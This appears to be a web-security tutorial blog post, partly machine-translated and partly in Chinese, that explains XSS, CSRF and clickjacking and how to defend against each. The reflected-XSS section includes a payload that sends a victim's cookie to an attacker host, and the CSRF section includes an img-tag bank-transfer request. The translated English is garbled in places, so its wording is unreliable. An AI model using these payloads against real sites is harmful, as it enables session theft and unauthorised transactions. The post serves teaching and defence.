XSS Cross Site Scripting
XSS (Cross Site Scripting), in order not to abbreviations and Cascading Style Sheets (Cascading Style Sheets, CSS) confusion, it will be abbreviated as XSS XSS. A malicious attacker to insert malicious Web page using Script code, when a user browsing the page, embedded inside a Web Script code is executed, so as to achieve the purpose of malicious users.
classification
-
The REFLECTED XSS (reflection-based XSS attacks)
-
Stored XSS (storage-based XSS attacks)
-
DOM-based or local XSS (DOM-based XSS attacks or local)
Reflected XSS (reflection-based XSS attacks)
mainly through the use of loopholes in the behavior of feedback systems, and deceive users active trigger, thereby initiating Web attacks.
For example:
1. Assuming, in carefully selected sites to find the product, less than the time when the search site will do "xxx not prompt the shelves." As shown below. 
2. In the Search box to search for content, filled
“<script>alert('xss')</script>”
- 1
Click Search.
3. The end of the page currently no filtering of the data entered is displayed directly on the page, then it will alert the string out. 
(Of course, the figure is analogue)
More than 3 steps only "entertain", XSS most critical is the fourth step.
4. The user then can be constructed to obtain the address of cookies, through the QQ group or spam, to allow others to click on this address:
http://you.163.com/search?keyword=<script>document.location=<span class="string">'http://xss.com/get?cookie='</span>+document.cookie</script>
- 1
If the user just has cheated logged in carefully selected sites, then the user's login cookie information has been sent to the attacker's server ( xss.com ) a. Of course, the attacker will do some of the more excessive operation.
Stored XSS (storage-based XSS attacks)
Stored XSS Reflected XSS and difference is that the script offensive is saved to the server and can be made from ordinary users complete service and execution, thus gained the ability to spread on the network.
As another chestnut:
-
Send an article, which contains a malicious script
Hello! When you see this text, your information is already unsafe! -
The rear end of the article there is no filter, save the contents of the article directly to the database.
-
When other readers reading this article, contains malicious script will be executed.
tips: save the entire article is HTML content, the front display is not the time to do filtering, it is highly likely this situation.
Here is more from the blog site for the title.
If we are operating not just pop up a message, and delete an article, issued a reactionary article, or I become a fan of this article and forward with malicious script, which is not to have the offensive.
** DOM-based or local XSS (DOM-based XSS attacks or local)
DOM, stands for Document Object Model, is a platform and language-neutral interface that allows programs and scripts to dynamically access and update document content, structure and style.
DOM XSS type is actually a special type of reflective XSS, it is a vulnerability-based DOM Document Object Model. You can dynamically modify page content through the DOM, DOM in obtaining data from the client and executed locally. Based on this characteristic, it can be implemented using XSS vulnerabilities using JS script.
DOM attribute may trigger type of XSS:
document.referer property
window.name property
property location
innerHTML property
documen.write属性
······**
Summary
XSS attacks essentially, by all means carry out an attack script on the target user's browser.
Prevention
for input, output, output the contents of all the client user as untrusted, the data added to the DOM or perform the DOM API, we need the content HtmlEncode or JavaScriptEncode, in order to prevent XSS attacks.
CSRF CSRF
CSRF (Cross-site request forgery) cross-site request forgery, also known as "One Click Attack" or Session Riding, often abbreviated as CSRF or XSRF, is a malicious use of the site. Although it sounds like a cross-site scripting (XSS), but it is very different from XSS, XSS trusted users in the use of the site, while CSRF is disguised by a trusted user's request to use from trusted sites. Compared with XSS attacks, CSRF attacks are often not very popular (and therefore their resources to guard against is quite rare) and difficult to defend, it is considered more dangerous than XSS. But often commit crimes together with XSS!
Detailed under this section transferred from hyddd Bowen http://www.cnblogs.com/hyddd/..., the example is like writing on the part of transcriptions so far, and made some changes, to pay tribute to the author hyddd & thanks.
What CSRF you can do?
You can understand CSRF attack: the attacker stole your identity to send malicious request on your behalf. CSRF can do things include: to send the name of your e-mail, messaging, steal your account, and even the purchase of goods, virtual currency transfer ...... problems caused include: disclosure of personal privacy and property safety.
Status CSRF Vulnerability
Such CSRF attacks have been proposed in the 2000 foreign security personnel, but in the country, until in 2006 began to be concerned about, in 2008, a number of large domestic and international community and interactive website were broke CSRF vulnerabilities, such as: NYTimes .com (New York Times), Metafilter (a large BLOG site), YouTube, and Baidu HI ...... now, many sites on the Internet are still unprepared for this, so called CSRF security industry as a "sleeping giant."
CSRF principle
The figure below illustrates a simple idea CSRF attack: 
It can be seen from the chart, to complete a CSRF attack, the victim must complete two steps in sequence:
- Login trusted site A, and generates Cookie locally.
- In the case of A is not out of, access to dangerous websites B.
See here, you might say: "If I do not satisfy more than one of the two conditions, I would not be CSRF attacks." Yes, it does, but you can not guarantee that the situation will not occur:
- 你不能保证你登录了一个网站后,不再打开一个tab页面并访问另外的网站。
- 你不能保证你关闭浏览器了后,你本地的Cookie立刻过期,你上次的会话已经结束。(事实上,关闭浏览器不能结束一个会话,但大多数人都会错误的认为关闭浏览器就等于退出登录/结束会话了……)
- 上图中所谓的攻击网站,可能是一个存在其他漏洞的可信任的经常被人访问的网站。
示例
上面大概地讲了一下CSRF攻击的思想,下面我将用几个例子详细说说具体的CSRF攻击,这里我以一个银行转账的操作作为例子(仅仅是例子,真实的银行网站没这么傻:>)
示例1
银行网站A,它以GET请求来完成银行转账的操作,如:http://www.mybank.com/Transfe…
危险网站B,它里面有一段HTML的代码如下:
<img src=http://www.mybank.com/Transfer.php?toBankId=11&money=1000>
首先,你登录了银行网站A,然后访问危险网站B,噢,这时你会发现你的银行账户少了1000块……
为什么会这样呢?原因是银行网站A违反了HTTP规范,使用GET请求更新资源。在访问危险网站B的之前,你已经登录了银行网站A,而B中的以GET的方式请求第三方资源(这里的第三方就是指银行网站了,原本这是一个合法的请求,但这里被不法分子利用了),所以你的浏览器会带上你的银行网站A的Cookie发出Get请求,去获取资源
http://www.mybank.com/Transfer.php?toBankId=11&money=1000
结果银行网站服务器收到请求后,认为这是一个更新资源操作(转账操作),所以就立刻进行转账操作……
其实可以看出,CSRF攻击是源于WEB的隐式身份验证机制!WEB的身份验证机制虽然可以保证一个请求是来自于某个用户的浏览器,但却无法保证该请求是用户批准发送的!
当前防御 CSRF 的几种策略
在业界目前防御 CSRF 攻击主要有三种策略:验证 HTTP Referer 字段;在请求地址中添加 token 并验证;在 HTTP 头中自定义属性并验证。下面就分别对这三种策略进行详细介绍。
验证 HTTP Referer 字段
利用HTTP头中的Referer判断请求来源是否合法。
优点:
简单易行,只需要在最后给所有安全敏感的请求统一增加一个拦截器来检查 Referer 的值就可以。特别是对于当前现有的系统,不需要改变当前系统的任何已有代码和逻辑,没有风险,非常便捷。
缺点:
- Referer 的值是由浏览器提供的,不可全信,低版本浏览器下Referer存在伪造风险。
- 用户自己可以设置浏览器使其在发送请求时不再提供 Referer时,网站将拒绝合法用户的访问。
在请求地址中添加 token 并验证
在请求中放入黑客所不能伪造的信息,并且该信息不存在于 cookie 之中,以HTTP请求参数的形式加入一个随机产生的 token交由服务端验证
优点:比检查 Referer 要安全一些,并且不涉及用户隐私。
缺点:对所有请求都添加token比较困难,难以保证 token 本身的安全,依然会被利用获取到token
在 HTTP 头中自定义属性并验证+One-Time Tokens
将token放到 HTTP 头中自定义的属性里。通过 XMLHttpRequest 的异步请求交由后端校验,并且一次有效。
优点:统一管理token输入输出,可以保证token的安全性
缺点:有局限性,无法在非异步的请求上实施
点击劫持
点击劫持,英文名clickjacking,也叫UI覆盖攻击,攻击者会利用一个或多个透明或不透明的层来诱骗用户支持点击按钮的操作,而实际的点击确实用户看不到的一个按钮,从而达到在用户不知情的情况下实施攻击。
这种攻击方式的关键在于可以实现页中页的 iframe 标签,并且可以使用css样式表将他不可见
如以上示意图的蓝色层,攻击者会通过一定的手段诱惑用户“在红色层”输入信息,但用户实际上实在蓝色层中,以此做欺骗行为。
拿支付宝做个例子
是的,这个是我伪造的,如果我将真正的充值站点隐藏在此界面上方。我想,聪明的你已经知道clickjacking的危险性了。
上图我估计做了一下错位和降低透明度,是不是很有意思呢?傻傻分不清的用户还以为是领取了奖品,其实是给陌生人充值了话费。
这种方法最常见的攻击场景是伪造一些网站盗取帐号信息,如支付宝、QQ、网易帐号等帐号的账密
目前,clickjacking还算比较冷门,很多安全意识不强的网站还未着手做clickjacking的防范。这是很危险的。
防范
防止点击劫持有两种主要方法:
X-FRAME-OPTIONS
X-FRAME-OPTIONS是微软提出的一个http头,指示浏览器不允许从其他域进行取景,专门用来防御利用iframe嵌套的点击劫持攻击。并且在IE8、Firefox3.6、Chrome4以上的版本均能很好的支持。
这个头有三个值:
DENY // 拒绝任何域加载
SAMEORIGIN // 允许同源域下加载
ALLOW-FROM // 可以定义允许frame加载的页面地址
顶层判断
在UI中采用防御性代码,以确保当前帧是最顶层的窗口
方法有多中,如
top != self || top.location != self.location || top.location != location
"Transfer from NSFOCUS blog": the original link. Http://blog.nsfocus.net/offensive-defensive-stances-web-security/